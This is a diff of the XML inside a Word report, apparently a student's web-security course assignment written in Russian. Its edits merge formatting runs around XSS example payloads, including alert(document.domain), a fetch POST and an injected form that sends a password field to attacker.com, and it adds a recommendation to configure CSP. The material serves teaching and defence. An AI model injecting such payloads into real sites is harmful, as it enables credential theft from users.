--- a/modules/mod_2/tasks/task_7/report.docx
+++ b/modules/mod_2/tasks/task_7/report.docx
@@ -383,7 +383,6 @@
         </w:rPr>
         <w:t>&gt;</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -397,15 +396,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:highlight w:val="lightGray"/>
         </w:rPr>
-        <w:t>(…)&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:highlight w:val="lightGray"/>
-        </w:rPr>
-        <w:t>/</w:t>
+        <w:t>(…)&lt;/</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -570,7 +561,6 @@
         <w:t>="alert(</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
@@ -580,7 +570,6 @@
         <w:t>document.domain</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
@@ -1133,7 +1122,6 @@
         </w:rPr>
         <w:t>q</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -1144,7 +1132,6 @@
         <w:t>=&lt;</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -1452,29 +1439,7 @@
           <w:highlight w:val="lightGray"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>fetch(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'/</w:t>
+        <w:t>&lt;fetch('/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1518,51 +1483,7 @@
           <w:highlight w:val="lightGray"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">', </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>{ method</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>: 'POST</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' }</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>', { method: 'POST' })</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1602,29 +1523,7 @@
           <w:highlight w:val="lightGray"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>&lt;form action="https://attacker.com</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"&gt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>input placeholder="</w:t>
+        <w:t>&lt;form action="https://attacker.com"&gt;&lt;input placeholder="</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1660,27 +1559,15 @@
         <w:t>пароль</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"&gt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:highlight w:val="lightGray"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/form&gt;</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:highlight w:val="lightGray"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"&gt;&lt;/form&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1773,7 +1660,27 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Так же необходимо настроить </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CSP. </w:t>
       </w:r>
     </w:p>
     <w:p>
